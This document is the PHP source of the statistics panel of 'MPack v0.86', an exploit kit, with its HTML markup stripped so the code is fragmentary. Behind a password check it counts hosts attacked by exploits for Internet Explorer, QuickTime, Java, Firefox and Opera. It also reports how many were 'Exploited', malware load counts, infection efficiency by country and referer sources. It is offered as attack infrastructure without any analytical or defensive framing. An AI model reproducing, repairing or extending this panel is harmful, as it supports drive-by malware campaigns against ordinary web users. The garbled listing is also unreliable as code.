MPack v0.86 stat


'; } include ('settings.php'); if (isset($_GET['pass'])) { $p=$_GET['pass']; if ($p==$Password) { echo ""; echo "
Attacked hosts: (total/uniq)
IE XP ALL".GetTotal("0day")." - ".GetUniq("0day")."
QuickTime".GetTotal("qtlexp")." - ".GetUniq("qtlexp")."
"; echo "
Win2000".GetTotal("jar")." - ".GetUniq("jar")."
"; echo "
Firefox".GetTotal("firefox")." - ".GetUniq("firefox")."
"; echo "
Opera7".GetTotal("opera7")." - ".GetUniq("opera7")."
"; echo "

"; $tt=GetTotal("all"); $tu=GetUniq("all"); echo ""; $ft=GetTotal("file"); $fu=GetUniq("file"); echo ""; $et=GetTotal("expl"); $eu=GetUniq("expl"); echo ""; echo ""; if ($BlockDuplicates==1) {$UB="ON";} else {$UB="OFF";}; echo ""; if ($OnlyDefiniedCoutries==1) {$CB="all except
".$CoutryList."";} else { $CB="OFF"; } echo "
"; echo "
Traffic: (total/uniq)
Total traff:".$tt." - ".$tu."
Exploited:".$ft." - ".$fu."
Loads count:".$et." - ".$eu."
Loader's response:".@round( ((($et/$ft))*100),2)."% - ".@round( ((($eu/$fu)*100)),2)."%
User blocking:".$UB."
Country blocking:".$CB."
Efficiency: ".@round( (($et/$tt)*100),2)."% - ".@round( (($eu/$tu)*100),2)."%


"; if ($UseMySQL==1) { echo ""; //make country stats $query = "SELECT * FROM ".$dbstats." WHERE statid = 'traff' ORDER BY count DESC"; $r = mysql_query($query); while ($array = @mysql_fetch_array($r)) { echo ""; } echo "
  Country  Traff  Loads  Efficiency 
 ".HTMLShowFlag($array['a2'])." ".$array['a2']." - ".ucfirst(strtolower($array['country'])); $traff = $array['count']; echo "".$traff." "; //check loads $query2 = "SELECT * FROM ".$dbstats." WHERE statid = 'load' AND a2 = '".$array['a2']."'"; $r2 = mysql_query($query2); $array2 = @mysql_fetch_array($r2); if ($array2['count'] > 0) { $loads = $array2['count']; } else { $loads = 0; } echo "".$loads; echo "".@round( (($loads/$traff)*100),2); echo "

Referers stats (from ".$MinRefs." visitors)
"; //referer stats echo ""; $query = "SELECT * FROM ".$dbstats."_refs ORDER BY count DESC"; $r = mysql_query($query); $NumRefs=0; while ($array = @mysql_fetch_array($r)) { $count = $array['count']; $ref = $array['referer']; if ($ref=="_") { $ref="_No referer"; } if ($count>$MinRefs) { echo ""; } $NumRefs+=1; } } } } ?>
  Referer  Count 
  ".$ref." ".$count."
uniq referers